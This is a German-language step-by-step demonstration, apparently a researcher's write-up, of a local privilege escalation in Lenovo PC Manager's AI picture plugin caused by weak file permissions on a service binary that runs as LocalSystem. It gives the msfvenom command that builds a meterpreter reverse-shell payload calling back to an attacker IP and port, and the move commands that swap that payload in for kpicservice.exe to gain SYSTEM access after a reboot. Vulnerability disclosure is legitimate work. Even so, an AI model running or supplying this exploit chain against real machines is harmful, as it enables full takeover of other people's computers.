
Schritt-für-Schritt-Demonstration einer lokalen Privilegienausweitung-Schwachstelle im Lenovo PC Manager, die schwache Dateiberechtigungen eines Systemdienstes ausnutzt, um durch Austausch der Nutzlast SYSTEM-Zugriff zu erlangen.
Zufällig beim Lernen über lokale Privilegienausweitung entdeckt.
In allen Versionen von Lenovo Computer Manager haben die Tools des Lenovo Computer Managers Berechtigungsmängel. Solange das Tool heruntergeladen ist, haben normale Benutzer die Berechtigung F (vollständige Kontrolle).

Da alle Versionen der Tools Berechtigungsprobleme aufweisen, können normale Benutzer Admin-Rechte erlangen. Hier wird das AI-Bildbetrachtungs-Plugin demonstriert, da es einen Dienst mit Systemberechtigungen hat, der eine Ausweitung auf System ermöglicht. Vor Version 5.1.100.1102 gab es im Lenovo Computer Manager das Plugin „AI-Bildbetrachtung".

Nach der Installation des AI-Bildbetrachtungs-Plugins existiert ein dauerhafter Dienst
C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

Verwenden Sie icacls, um die Dateiberechtigungen zu überprüfen

Es wurde festgestellt, dass normale Users die Berechtigung I F (vollständige Kontrolle) haben. Erstellen Sie einen normalen Benutzer

Aus Angriffsperspektive: Wenn die Administratorengruppe nicht angemeldet ist, müssen alle Benutzer abgemeldet werden. Dann melden wir uns als user1 an und verwenden sc, um den Dienst zu überprüfen. Sein Benutzer ist LocalSystem
sc qc KPICService_Lenovo

Dabei ist C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe die Datei, über die normale Benutzer die vollständige Kontrolle haben

Aufgrund von Einschränkungen wird der Dienst jedoch ständig belegt, und normale Benutzer benötigen admin, um ihn zu schließen
Alternativer Ansatz: Da normale Benutzer die vollständige Kontrolle haben, können sie die Datei verschieben. Beim Neustart liest der Dienst den konfigurierten Pfad und führt kpicservice.exe weiterhin als LocalSystem aus
Nun zur Praxis: Zuerst wird ein kpicservice.exe erstellt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -f exe -o kpicservice.exe
Gleichzeitig wird der ursprüngliche Dateipfad verschoben und die Shell durch die ursprüngliche kpicservice.exe ersetzt
move C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe kpicservice.exe
move Desktop\kpicservice.exe C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

Wenn das Gerät nun neu gestartet wird, startet der Dienst die ersetzte kpicservice.exe im Pfad und erhält Systemberechtigungen
